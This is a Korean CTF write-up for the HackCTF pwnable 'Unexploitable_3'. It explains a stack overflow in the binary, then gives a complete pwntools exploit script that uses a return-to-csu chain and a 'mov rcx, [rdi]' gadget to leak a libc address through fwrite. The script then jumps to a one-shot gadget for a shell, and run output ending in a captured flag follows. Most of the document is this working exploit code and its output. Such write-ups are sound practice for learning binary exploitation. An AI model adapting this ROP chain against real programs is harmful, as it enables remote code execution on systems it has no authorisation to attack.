[HackCTF / pwnable] Unexploitable_3

HackCTF - Unexploitable_3

Summary

• 64bit

• rtc

Analysis

int __cdecl main(int argc, const char **argv, const char **envp)
{
  char s; // [rsp+0h] [rbp-10h]
​
  setvbuf(stdout, 0LL, 2, 0LL);
  setvbuf(stdin, 0LL, 2, 0LL);
  fwrite("Impossible RTL ha? Nothing for you!\n", 1uLL, 0x24uLL, stdout);
  fgets(&s, 256, stdin);
  return 0;
}

fgets로 s에 입력을받아서 오버플로우가 생긴다. fwrite로 setvbuf의 주소를 출력하고 oneshot가젯을 쓰면 된다.

return to csu로는 3개 인자셋팅밖에 할 수 없다. 그래서 가젯들을 보니 mov rcx, qword ptr [rdi] ; ret 가젯이 있다. 이거를 사용해서 fwrite의 4번째 인자를 셋팅해 주면 된다.

Exploit

from pwn import *
​
e = ELF("./Unexploitable_3")
#p = process("./Unexploitable_3")
p = remote("ctf.j0n9hyun.xyz", 3034)
libc = e.libc
​
oneshot = 0x45216;
pop_rdi_ret = 0x0000000000400743
gadget = 0x0000000000400658 # mov rcx, qword ptr [rdi] ; ret
​
p.recvuntil("Impossible RTL ha? Nothing for you!\n")
​
pause()
​
payload = ""
payload += "A"*(0x10+0x8)
​
#fwrite(e.got["setvbuf"], 1, 8, stdout);
payload += p64(pop_rdi_ret)
payload += p64(e.symbols["stdout"])
payload += p64(gadget)
​
payload += p64(e.symbols["__libc_csu_init"]+90)
payload += p64(0x0)
payload += p64(0x1)
payload += p64(e.got["fwrite"])
payload += p64(0x8)
payload += p64(0x1)
payload += p64(e.got["setvbuf"])
​
payload += p64(e.symbols["__libc_csu_init"]+64)
payload += p64(0x0)
payload += p64(0x0)
payload += p64(0x0)
payload += p64(0x0)
payload += p64(0x0)
payload += p64(0x0)
payload += p64(0x0)
​
payload += p64(e.symbols["main"])
​
p.sendline(payload)
​
setvbuf_add = u64(p.recvuntil("\x7f")[-6:] + "\x00\x00")
libc_base = setvbuf_add - libc.symbols["setvbuf"]
​
payload = ""
payload += "A"*(0x10+0x8)
payload += p64(libc_base + oneshot)
​
p.sendline(payload)
​
p.interactive()

Flag

cg10036@cg10036-virtual-machine:~/CTF/hackCTF/Unexploitable_3$ p ex.py 
[*] '/home/cg10036/CTF/hackCTF/Unexploitable_3/Unexploitable_3'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x400000)
[+] Opening connection to ctf.j0n9hyun.xyz on port 3034: Done
[*] '/lib/x86_64-linux-gnu/libc.so.6'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      PIE enabled
[*] Paused (press any to continue)
[*] Switching to interactive mode
\x00\x00Impossible RTL ha? Nothing for you!
$ cat flag
HackCTF{bss_4lw4y5_h4s_std1n/std0ut}